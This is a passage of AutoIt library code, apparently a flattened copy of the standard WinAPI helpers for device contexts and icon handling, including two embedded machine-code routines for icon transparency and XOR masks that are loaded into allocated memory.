= __INIT (BINARY ("0x48894C240848895424104C894424184C894C2420554157415648C7C009000000" & "4883EC0848C704240000000048FFC875EF4883EC284883BC24A0000000007405" & "4831C0EB0748C7C0010000004821C00F85840000004883BC24A8000000007405" & "4831C0EB0748C7C0010000004821C07555488BAC24A000000048837D18007405" & "4831C0EB0748C7C0010000004821C07522488BAC24A800000048837D18007405" & "4831C0EB0748C7C0010000004821C07502EB0948C7C001000000EB034831C048" & "21C07502EB0948C7C001000000EB034831C04821C07502EB0948C7C001000000" & "EB034831C04821C0740B4831C04863C0E9D701000048C74424280000000048C7" & "44243000000000488BAC24A00000004C637D0849FFCF4C3B7C24300F8C9C0100" & "0048C74424380000000048C74424400000000048C744244800000000488BAC24" & "A00000004C637D0449FFCF4C3B7C24480F8CDB000000488BAC24A00000004C8B" & "7D184C037C24284983C7034C897C2450488B6C2450807D000074264C8B7C2440" & "4C8B74243849F7DE4983C61F4C89F148C7C00100000048D3E04909C74C897C24" & "4048FF4424384C8B7C24384983FF1F7E6F4C8B7C244049F7D74C897C244048C7" & "442458180000004831C0483B4424587F3D488BAC24A80000004C8B7D184C037C" & "24604C897C24504C8B7C2440488B4C245849D3FF4C89F850488B6C2458588845" & "0048FF4424604883442458F871B948C74424380000000048C744244000000000" & "48834424280448FF4424480F810BFFFFFF48837C24380074794C8B7C244049F7" & "D74C8B74243849F7DE4983C6204C89F148C7C0FFFFFFFF48D3E04921C74C897C" & "244048C7442458180000004831C0483B4424587F3D488BAC24A80000004C8B7D" & "184C037C24604C897C24504C8B7C2440488B4C245849D3FF4C89F850488B6C24" & "585888450048FF4424604883442458F871B948FF4424300F814AFEFFFF48C7C0" & "010000004863C0EB034831C04883C470415E415F5DC3" ) ) ELSE $PPROC = __INIT (BINARY ("0x555357BA0800000083EC04C70424000000004A75F3837C243800740431C0EB05" & "B80100000021C07562837C243C00740431C0EB05B80100000021C0753F8B6C24" & "38837D1400740431C0EB05B80100000021C075198B6C243C837D1400740431C0" & "EB05B80100000021C07502EB07B801000000EB0231C021C07502EB07B8010000" & "00EB0231C021C07502EB07B801000000EB0231C021C0740731C0E969010000C7" & "042400000000C7442404000000008B6C24388B5D084B3B5C24040F8C3F010000" & "C744240800000000C744240C00000000C7442410000000008B6C24388B5D044B" & "3B5C24100F8CA90000008B6C24388B5D14031C2483C303895C24148B6C241480" & "7D0000741C8B5C240C8B7C2408F7DF83C71F89F9B801000000D3E009C3895C24" & "0CFF4424088B5C240883FB1F7E578B5C240CF7D3895C240CC744241818000000" & "31C03B4424187F2D8B6C243C8B5D14035C241C895C24148B5C240C8B4C2418D3" & "FB538B6C241858884500FF44241C83442418F871CBC744240800000000C74424" & "0C0000000083042404FF4424100F8145FFFFFF837C240800745B8B5C240CF7D3" & "8B7C2408F7DF83C72089F9B8FFFFFFFFD3E021C3895C240CC744241818000000" & "31C03B4424187F2D8B6C243C8B5D14035C241C895C24148B5C240C8B4C2418D3" & "FB538B6C241858884500FF44241C83442418F871CBFF4424040F81AFFEFFFFB8" & "01000000EB0231C083C4205F5B5DC21000" ) ) ENDIF ENDIF RETURN $PPROC ENDFUNC FUNC __XORPROC () STATIC $PPROC = 0 IF NOT $PPROC THEN IF @AUTOITX64 THEN $PPROC = __INIT (BINARY ("0x48894C240848895424104C894424184C894C24205541574831C050504883EC28" & "48837C24600074054831C0EB0748C7C0010000004821C0751B48837C24680074" & "054831C0EB0748C7C0010000004821C07502EB0948C7C001000000EB034831C0" & "4821C074084831C04863C0EB7748C7442428000000004C637C24584983C7FC4C" & "3B7C24287C4F4C8B7C24604C037C24284C897C2430488B6C2430807D00007405" & "4831C0EB0748C7C0010000004821C0741C4C8B7C24684C037C24284983C7034C" & "897C2430488B6C2430C64500FF48834424280471A148C7C0010000004863C0EB" & "034831C04883C438415F5DC3" ) ) ELSE $PPROC = __INIT (BINARY ("0x555331C05050837C241C00740431C0EB05B80100000021C07516837C24200074" & "0431C0EB05B80100000021C07502EB07B801000000EB0231C021C0740431C0EB" & "5AC70424000000008B5C241883C3FC3B1C247C3E8B5C241C031C24895C24048B" & "6C2404807D0000740431C0EB05B80100000021C074168B5C2420031C2483C303" & "895C24048B6C2404C64500FF8304240471B6B801000000EB0231C083C4085B5D" & "C21000" ) ) ENDIF ENDIF RETURN $PPROC ENDFUNC #EndRegion Embedded DLL Functions #Region Internal Functions FUNC __INIT ($DDATA ) LOCAL $ILENGTH = BINARYLEN ($DDATA ) LOCAL $ARET = DLLCALL ("kernel32.dll" , "ptr" , "VirtualAlloc" , "ptr" , 0 , "ulong_ptr" , $ILENGTH , "dword" , 4096 , "dword" , 64 ) IF @ERROR OR NOT $ARET [0 ] THEN __FATALEXIT (1 , "Error allocating memory." ) LOCAL $TDATA = DLLSTRUCTCREATE ("byte[" & $ILENGTH & "]" , $ARET [0 ] ) DLLSTRUCTSETDATA ($TDATA , 1 , $DDATA ) RETURN $ARET [0 ] ENDFUNC #EndRegion Internal Functions #Region Global Variables and Constants GLOBAL CONST $DI_MASK = 1 GLOBAL CONST $DI_IMAGE = 2 GLOBAL CONST $DI_NORMAL = 3 GLOBAL CONST $DI_COMPAT = 4 GLOBAL CONST $DI_DEFAULTSIZE = 8 GLOBAL CONST $DI_NOMIRROR = 16 GLOBAL CONST $DISPLAY_DEVICE_ATTACHED_TO_DESKTOP = 1 GLOBAL CONST $DISPLAY_DEVICE_MULTI_DRIVER = 2 GLOBAL CONST $DISPLAY_DEVICE_PRIMARY_DEVICE = 4 GLOBAL CONST $DISPLAY_DEVICE_MIRRORING_DRIVER = 8 GLOBAL CONST $DISPLAY_DEVICE_VGA_COMPATIBLE = 16 GLOBAL CONST $DISPLAY_DEVICE_REMOVABLE = 32 GLOBAL CONST $DISPLAY_DEVICE_DISCONNECT = 33554432 GLOBAL CONST $DISPLAY_DEVICE_REMOTE = 67108864 GLOBAL CONST $DISPLAY_DEVICE_MODESPRUNED = 134217728 #EndRegion Global Variables and Constants #Region Functions list #EndRegion Functions list #Region Public Functions FUNC _WINAPI_CREATECOMPATIBLEDC ($HDC ) LOCAL $ARESULT = DLLCALL ("gdi32.dll" , "handle" , "CreateCompatibleDC" , "handle" , $HDC ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_DELETEDC ($HDC ) LOCAL $ARESULT = DLLCALL ("gdi32.dll" , "bool" , "DeleteDC" , "handle" , $HDC ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_DRAWEDGE ($HDC , $TRECT , $IEDGETYPE , $IFLAGS ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "bool" , "DrawEdge" , "handle" , $HDC , "struct*" , $TRECT , "uint" , $IEDGETYPE , "uint" , $IFLAGS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_DRAWFRAMECONTROL ($HDC , $TRECT , $ITYPE , $ISTATE ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "bool" , "DrawFrameControl" , "handle" , $HDC , "struct*" , $TRECT , "uint" , $ITYPE , "uint" , $ISTATE ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_DRAWICON ($HDC , $IX , $IY , $HICON ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "bool" , "DrawIcon" , "handle" , $HDC , "int" , $IX , "int" , $IY , "handle" , $HICON ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_DRAWICONEX ($HDC , $IX , $IY , $HICON , $IWIDTH = 0 , $IHEIGHT = 0 , $ISTEP = 0 , $HBRUSH = 0 , $IFLAGS = 3 ) LOCAL $IOPTIONS SWITCH $IFLAGS CASE 1 $IOPTIONS = $DI_MASK CASE 2 $IOPTIONS = $DI_IMAGE CASE 3 $IOPTIONS = $DI_NORMAL CASE 4 $IOPTIONS = $DI_COMPAT CASE 5 $IOPTIONS = $DI_DEFAULTSIZE CASE ELSE $IOPTIONS = $DI_NOMIRROR ENDSWITCH LOCAL $ARESULT = DLLCALL ("user32.dll" , "bool" , "DrawIconEx" , "handle" , $HDC , "int" , $IX , "int" , $IY , "handle" , $HICON , "int" , $IWIDTH , "int" , $IHEIGHT , "uint" , $ISTEP , "handle" , $HBRUSH , "uint" , $IOPTIONS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_DRAWTEXT ($HDC , $STEXT , BYREF $TRECT , $IFLAGS ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "int" , "DrawTextW" , "handle" , $HDC , "wstr" , $STEXT , "int" , + 4294967295 , "struct*" , $TRECT , "uint" , $IFLAGS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_ENUMDISPLAYDEVICES ($SDEVICE , $IDEVNUM ) LOCAL $TNAME = 0 , $IFLAGS = 0 , $ADEVICE [5 ] IF $SDEVICE <> "" THEN $TNAME = DLLSTRUCTCREATE ("wchar Text[" & STRINGLEN ($SDEVICE ) + 1 & "]" ) DLLSTRUCTSETDATA ($TNAME , "Text" , $SDEVICE ) ENDIF LOCAL CONST $TAGDISPLAY_DEVICE = "dword Size;wchar Name[32];wchar String[128];dword Flags;wchar ID[128];wchar Key[128]" LOCAL $TDEVICE = DLLSTRUCTCREATE ($TAGDISPLAY_DEVICE ) LOCAL $IDEVICE = DLLSTRUCTGETSIZE ($TDEVICE ) DLLSTRUCTSETDATA ($TDEVICE , "Size" , $IDEVICE ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "EnumDisplayDevicesW" , "struct*" , $TNAME , "dword" , $IDEVNUM , "struct*" , $TDEVICE , "dword" , 1 ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) LOCAL $IN = DLLSTRUCTGETDATA ($TDEVICE , "Flags" ) IF BITAND ($IN , $DISPLAY_DEVICE_ATTACHED_TO_DESKTOP ) <> 0 THEN $IFLAGS = BITOR ($IFLAGS , 1 ) IF BITAND ($IN , $DISPLAY_DEVICE_PRIMARY_DEVICE ) <> 0 THEN $IFLAGS = BITOR ($IFLAGS , 2 ) IF BITAND ($IN , $DISPLAY_DEVICE_MIRRORING_DRIVER ) <> 0 THEN $IFLAGS = BITOR ($IFLAGS , 4 ) IF BITAND ($IN , $DISPLAY_DEVICE_VGA_COMPATIBLE ) <> 0 THEN $IFLAGS = BITOR ($IFLAGS , 8 ) IF BITAND ($IN , $DISPLAY_DEVICE_REMOVABLE ) <> 0 THEN $IFLAGS = BITOR ($IFLAGS , 16 ) IF BITAND ($IN , $DISPLAY_DEVICE_MODESPRUNED ) <> 0 THEN $IFLAGS = BITOR ($IFLAGS , 32 ) $ADEVICE [0 ] = TRUE $ADEVICE [1 ] = DLLSTRUCTGETDATA ($TDEVICE , "Name" ) $ADEVICE [2 ] = DLLSTRUCTGETDATA ($TDEVICE , "String" ) $ADEVICE [3 ] = $IFLAGS $ADEVICE [4 ] = DLLSTRUCTGETDATA ($TDEVICE , "ID" ) RETURN $ADEVICE ENDFUNC FUNC _WINAPI_FILLRECT ($HDC , $TRECT , $HBRUSH ) LOCAL $ARESULT IF ISPTR ($HBRUSH ) THEN $ARESULT = DLLCALL ("user32.dll" , "int" , "FillRect" , "handle" , $HDC , "struct*" , $TRECT , "handle" , $HBRUSH ) ELSE $ARESULT = DLLCALL ("user32.dll" , "int" , "FillRect" , "handle" , $HDC , "struct*" , $TRECT , "dword_ptr" , $HBRUSH ) ENDIF IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_FRAMERECT ($HDC , $TRECT , $HBRUSH ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "int" , "FrameRect" , "handle" , $HDC , "struct*" , $TRECT , "handle" , $HBRUSH ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_GETBKMODE ($HDC ) LOCAL $ARESULT = DLLCALL ("gdi32.dll" , "int" , "GetBkMode" , "handle" , $HDC ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_GETDC ($HWND ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "handle" , "GetDC" , "hwnd" , $HWND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_GETDCEX ($HWND , $HRGN , $IFLAGS ) LOCAL $ARET = DLLCALL ("user32.dll" , "handle" , "GetDCEx" , "hwnd" , $HWND , "handle" , $HRGN , "dword" , $IFLAGS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_GETDEVICECAPS ($HDC , $IINDEX ) LOCAL $ARESULT = DLLCALL ("gdi32.dll" , "int" , "GetDeviceCaps" , "handle" , $HDC , "int" , $IINDEX ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_GETTEXTCOLOR ($HDC ) LOCAL $ARET = DLLCALL ("gdi32.dll" , "dword" , "GetTextColor" , "handle" , $HDC ) IF @ERROR OR ($ARET [0 ] = 0xFFFFFFFF ) THEN RETURN SETERROR (@ERROR , @EXTENDED , + 4294967295 ) RETURN __RGB ($ARET [0 ] ) ENDFUNC FUNC _WINAPI_GETWINDOWDC ($HWND ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "handle" , "GetWindowDC" , "hwnd" , $HWND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_PRINTWINDOW ($HWND , $HDC , $BCLIENT = FALSE ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "PrintWindow" , "hwnd" , $HWND , "handle" , $HDC , "uint" , $BCLIENT ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_RELEASEDC ($HWND , $HDC ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "int" , "ReleaseDC" , "hwnd" , $HWND , "handle" , $HDC ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_RESTOREDC ($HDC , $IID ) LOCAL $ARET = DLLCALL ("gdi32.dll" , "bool" , "RestoreDC" , "handle" , $HDC , "int" , $IID ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_SAVEDC ($HDC ) LOCAL $ARET = DLLCALL ("gdi32.dll" , "int" , "SaveDC" , "handle" , $HDC ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_SETBKCOLOR ($HDC , $ICOLOR ) LOCAL $ARESULT = DLLCALL ("gdi32.dll" , "INT" , "SetBkColor" , "handle" , $HDC , "INT" , $ICOLOR ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , + 4294967295 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_SETBKMODE ($HDC , $IBKMODE ) LOCAL $ARESULT = DLLCALL ("gdi32.dll" , "int" , "SetBkMode" , "handle" , $HDC , "int" , $IBKMODE ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_SETTEXTCOLOR ($HDC , $ICOLOR ) LOCAL $ARESULT = DLLCALL ("gdi32.dll" , "INT" , "SetTextColor" , "handle" , $HDC , "INT" , $ICOLOR ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , + 4294967295 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_TWIPSPERPIXELX () LOCAL $HDC , $ITWIPSPERPIXELX $HDC = _WINAPI_GETDC (0 ) LOCAL CONST $__WINAPICONSTANT_LOGPIXELSX = 88 $ITWIPSPERPIXELX = 1440 / _WINAPI_GETDEVICECAPS ($HDC , $__WINAPICONSTANT_LOGPIXELSX ) _WINAPI_RELEASEDC (0 , $HDC ) RETURN $ITWIPSPERPIXELX ENDFUNC FUNC _WINAPI_TWIPSPERPIXELY () LOCAL $HDC , $ITWIPSPERPIXELY $HDC = _WINAPI_GETDC (0 ) LOCAL CONST $__WINAPICONSTANT_LOGPIXELSY = 90 $ITWIPSPERPIXELY = 1440 / _WINAPI_GETDEVICECAPS ($HDC , $__WINAPICONSTANT_LOGPIXELSY ) _WINAPI_RELEASEDC (0 , $HDC ) RETURN $ITWIPSPERPIXELY ENDFUNC #EndRegion Public Functions #Region Internal Functions #EndRegion Internal Functions #Region Global Variables and Constants #EndRegion Global Variables and Constants #Region Functions list #EndRegion Functions list #Region Public Functions GLOBAL CONST $TAGICONINFO = "bool Icon;dword XHotSpot;dword YHotSpot;handle hMask;handle hColor" FUNC _WINAPI_ADDICONTRANSPARENCY ($HICON , $IPERCENT = 50 , $BDELETE = FALSE ) LOCAL $TBITMAP , $HDIB = 0 , $HRESULT = 0 LOCAL $AHBITMAP [2 ] LOCAL $TICONINFO = DLLSTRUCTCREATE ($TAGICONINFO ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "GetIconInfo" , "handle" , $HICON , "struct*" , $TICONINFO ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) FOR $I = 0 TO 1 $AHBITMAP [$I ] = DLLSTRUCTGETDATA ($TICONINFO , $I + 4 ) NEXT LOCAL $IERROR = 0 DO $HDIB = _WINAPI_COPYBITMAP ($AHBITMAP [1 ] ) IF NOT $HDIB THEN $IERROR = 20 EXITLOOP ENDIF $TBITMAP = DLLSTRUCTCREATE ($TAGBITMAP ) IF (NOT _WINAPI_GETOBJECT ($HDIB , DLLSTRUCTGETSIZE ($TBITMAP ) , $TBITMAP ) ) OR (DLLSTRUCTGETDATA ($TBITMAP , "bmBitsPixel" ) <> 32 ) THEN $IERROR = 21 EXITLOOP ENDIF $ARET = DLLCALL ("user32.dll" , "lresult" , "CallWindowProc" , "PTR" , __TRANSPARENCYPROC () , "hwnd" , 0 , "uint" , $IPERCENT , "wparam" , DLLSTRUCTGETPTR ($TBITMAP ) , "lparam" , 0 ) IF @ERROR OR NOT $ARET [0 ] THEN $IERROR = @ERROR + 30 EXITLOOP ENDIF IF $ARET [0 ] = + 4294967295 THEN $HRESULT = _WINAPI_CREATEEMPTYICON (DLLSTRUCTGETDATA ($TBITMAP , "bmWidth" ) , DLLSTRUCTGETDATA ($TBITMAP , "bmHeight" ) ) ELSE $HRESULT = _WINAPI_CREATEICONINDIRECT ($HDIB , $AHBITMAP [0 ] ) ENDIF IF NOT $HRESULT THEN $IERROR = 22 UNTIL 1 IF $HDIB THEN _WINAPI_DELETEOBJECT ($HDIB ) ENDIF FOR $I = 0 TO 1 IF $AHBITMAP [$I ] THEN _WINAPI_DELETEOBJECT ($AHBITMAP [$I ] ) ENDIF NEXT IF $IERROR THEN RETURN SETERROR ($IERROR , 0 , 0 ) IF $BDELETE THEN _WINAPI_DESTROYICON ($HICON ) ENDIF RETURN $HRESULT ENDFUNC FUNC _WINAPI_COPYICON ($HICON ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "handle" , "CopyIcon" , "handle" , $HICON ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_CREATE32BITHICON ($HICON , $BDELETE = FALSE ) LOCAL $AHBITMAP [2 ] , $HRESULT = 0 LOCAL $ADIB [2 ] [2 ] = [[0 , 0 ] , [0 , 0 ] ] LOCAL $TICONINFO = DLLSTRUCTCREATE ($TAGICONINFO ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "GetIconInfo" , "handle" , $HICON , "struct*" , $TICONINFO ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF NOT $ARET [0 ] THEN RETURN SETERROR (10 , 0 , 0 ) FOR $I = 0 TO 1 $AHBITMAP [$I ] = DLLSTRUCTGETDATA ($TICONINFO , $I + 4 ) NEXT IF _WINAPI_ISALPHABITMAP ($AHBITMAP [1 ] ) THEN $ADIB [0 ] [0 ] = _WINAPI_CREATEANDBITMAP ($AHBITMAP [1 ] ) IF NOT @ERROR THEN $HRESULT = _WINAPI_CREATEICONINDIRECT ($AHBITMAP [1 ] , $ADIB [0 ] [0 ] ) ENDIF ELSE LOCAL $TSIZE = _WINAPI_GETBITMAPDIMENSION ($AHBITMAP [1 ] ) LOCAL $ASIZE [2 ] FOR $I = 0 TO 1 $ASIZE [$I ] = DLLSTRUCTGETDATA ($TSIZE , $I + 1 ) NEXT LOCAL $HSRCDC = _WINAPI_CREATECOMPATIBLEDC (0 ) LOCAL $HDSTDC = _WINAPI_CREATECOMPATIBLEDC (0 ) LOCAL $HSRCSV , $HDSTSV FOR $I = 0 TO 1 $ADIB [$I ] [0 ] = _WINAPI_CREATEDIB ($ASIZE [0 ] , $ASIZE [1 ] ) $ADIB [$I ] [1 ] = $__G_VEXT $HSRCSV = _WINAPI_SELECTOBJECT ($HSRCDC , $AHBITMAP [$I ] ) $HDSTSV = _WINAPI_SELECTOBJECT ($HDSTDC , $ADIB [$I ] [0 ] ) _WINAPI_BITBLT ($HDSTDC , 0 , 0 , $ASIZE [0 ] , $ASIZE [1 ] , $HSRCDC , 0 , 0 , 12583114 ) _WINAPI_SELECTOBJECT ($HSRCDC , $HSRCSV ) _WINAPI_SELECTOBJECT ($HDSTDC , $HDSTSV ) NEXT _WINAPI_DELETEDC ($HSRCDC ) _WINAPI_DELETEDC ($HDSTDC ) $ARET = DLLCALL ("user32.dll" , "lresult" , "CallWindowProc" , "ptr" , __XORPROC () , "ptr" , 0 , "uint" , $ASIZE [0 ] * $ASIZE [1 ] * 4 , "wparam" , $ADIB [0 ] [1 ] , "lparam" , $ADIB [1 ] [1 ] ) IF NOT @ERROR AND $ARET [0 ] THEN $HRESULT = _WINAPI_CREATEICONINDIRECT ($ADIB [1 ] [0 ] , $AHBITMAP [0 ] ) ENDIF ENDIF FOR $I = 0 TO 1 _WINAPI_DELETEOBJECT ($AHBITMAP [$I ] ) IF $ADIB [$I ] [0 ] THEN _WINAPI_DELETEOBJECT ($ADIB [$I ] [0 ] ) ENDIF NEXT IF NOT $HRESULT THEN RETURN SETERROR (11 , 0 , 0 ) IF $BDELETE THEN _WINAPI_DESTROYICON ($HICON ) ENDIF RETURN $HRESULT ENDFUNC FUNC _WINAPI_CREATEEMPTYICON ($IWIDTH , $IHEIGHT , $IBITSPERPEL = 32 ) LOCAL $HXOR = _WINAPI_CREATEDIB ($IWIDTH , $IHEIGHT , $IBITSPERPEL ) LOCAL $HAND = _WINAPI_CREATEDIB ($IWIDTH , $IHEIGHT , 1 ) LOCAL $HDC = _WINAPI_CREATECOMPATIBLEDC (0 ) LOCAL $HSV = _WINAPI_SELECTOBJECT ($HDC , $HAND ) LOCAL $HBRUSH = _WINAPI_CREATESOLIDBRUSH (16777215 ) LOCAL $TRECT = _WINAPI_CREATERECT (0 , 0 , $IWIDTH , $IHEIGHT ) _WINAPI_FILLRECT ($HDC , $TRECT , $HBRUSH ) _WINAPI_DELETEOBJECT ($HBRUSH ) _WINAPI_SELECTOBJECT ($HDC , $HSV ) _WINAPI_DELETEDC ($HDC ) LOCAL $HICON = _WINAPI_CREATEICONINDIRECT ($HXOR , $HAND ) LOCAL $IERROR = @ERROR IF $HXOR THEN _WINAPI_DELETEOBJECT ($HXOR ) ENDIF IF $HAND THEN _WINAPI_DELETEOBJECT ($HAND ) ENDIF IF NOT $HICON THEN RETURN SETERROR ($IERROR + 10 , 0 , 0 ) RETURN $HICON ENDFUNC FUNC _WINAPI_CREATEICON ($HINSTANCE , $IWIDTH , $IHEIGHT , $IPLANES , $IBITSPIXEL , $PANDBITS , $PXORBITS ) LOCAL $ARET = DLLCALL ("user32.dll" , "handle" , "CreateIcon" , "handle" , $HINSTANCE , "int" , $IWIDTH , "int" , $IHEIGHT , "byte" , $IPLANES , "byte" , $IBITSPIXEL , "struct*" , $PANDBITS , "struct*" , $PXORBITS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_CREATEICONFROMRESOURCEEX ($PDATA , $ISIZE , $BICON = TRUE , $IXDESIREDPIXELS = 0 , $IYDESIREDPIXELS = 0 , $IFLAGS = 0 ) LOCAL $ARET = DLLCALL ("user32.dll" , "handle" , "CreateIconFromResourceEx" , "ptr" , $PDATA , "dword" , $ISIZE , "bool" , $BICON , "dword" , 196608 , "int" , $IXDESIREDPIXELS , "int" , $IYDESIREDPIXELS , "uint" , $IFLAGS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_CREATEICONINDIRECT ($HBITMAP , $HMASK , $IXHOTSPOT = 0 , $IYHOTSPOT = 0 , $BICON = TRUE ) LOCAL $TICONINFO = DLLSTRUCTCREATE ($TAGICONINFO ) DLLSTRUCTSETDATA ($TICONINFO , 1 , $BICON ) DLLSTRUCTSETDATA ($TICONINFO , 2 , $IXHOTSPOT ) DLLSTRUCTSETDATA ($TICONINFO , 3 , $IYHOTSPOT ) DLLSTRUCTSETDATA ($TICONINFO , 4 , $HMASK ) DLLSTRUCTSETDATA ($TICONINFO , 5 , $HBITMAP ) LOCAL $ARET = DLLCALL ("user32.dll" , "handle" , "CreateIconIndirect" , "struct*" , $TICONINFO ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_DESTROYICON ($HICON ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "bool" , "DestroyIcon" , "handle" , $HICON ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_EXTRACTICON ($SICON , $IINDEX , $BSMALL = FALSE ) LOCAL $PLARGE , $PSMALL , $TPTR = DLLSTRUCTCREATE ("ptr" ) IF $BSMALL THEN $PLARGE = 0 $PSMALL = DLLSTRUCTGETPTR ($TPTR ) ELSE $PLARGE = DLLSTRUCTGETPTR ($TPTR ) $PSMALL = 0 ENDIF DLLCALL ("shell32.dll" , "uint" , "ExtractIconExW" , "wstr" , $SICON , "int" , $IINDEX , "ptr" , $PLARGE , "ptr" , $PSMALL , "uint" , 1 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN DLLSTRUCTGETDATA ($TPTR , 1 ) ENDFUNC FUNC _WINAPI_EXTRACTICONEX ($SFILEPATH , $IINDEX , $PALARGE , $PASMALL , $IICONS ) LOCAL $ARESULT = DLLCALL ("shell32.dll" , "uint" , "ExtractIconExW" , "wstr" , $SFILEPATH , "int" , $IINDEX , "struct*" , $PALARGE , "struct*" , $PASMALL , "uint" , $IICONS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_FILEICONINIT ($BRESTORE = TRUE ) LOCAL $ARET = DLLCALL ("shell32.dll" , "int" , 660 , "int" , $BRESTORE ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) RETURN 1 ENDFUNC FUNC _WINAPI_GETICONDIMENSION ($HICON ) LOCAL $TICONINFO = DLLSTRUCTCREATE ($TAGICONINFO ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "GetIconInfo" , "handle" , $HICON , "struct*" , $TICONINFO ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) LOCAL $TSIZE = _WINAPI_GETBITMAPDIMENSION (DLLSTRUCTGETDATA ($TICONINFO , 5 ) ) FOR $I = 4 TO 5 _WINAPI_DELETEOBJECT (DLLSTRUCTGETDATA ($TICONINFO , $I ) ) NEXT IF NOT ISDLLSTRUCT ($TSIZE ) THEN RETURN SETERROR (20 , 0 , 0 ) RETURN $TSIZE ENDFUNC FUNC _WINAPI_GETICONINFO ($HICON ) LOCAL $TINFO = DLLSTRUCTCREATE ($TAGICONINFO ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "GetIconInfo" , "handle" , $HICON , "struct*" , $TINFO ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) LOCAL $AICON [6 ] $AICON [0 ] = TRUE $AICON [1 ] = DLLSTRUCTGETDATA ($TINFO , "Icon" ) <> 0 $AICON [2 ] = DLLSTRUCTGETDATA ($TINFO , "XHotSpot" ) $AICON [3 ] = DLLSTRUCTGETDATA ($TINFO , "YHotSpot" ) $AICON [4 ] = DLLSTRUCTGETDATA ($TINFO , "hMask" ) $AICON [5 ] = DLLSTRUCTGETDATA ($TINFO , "hColor" ) 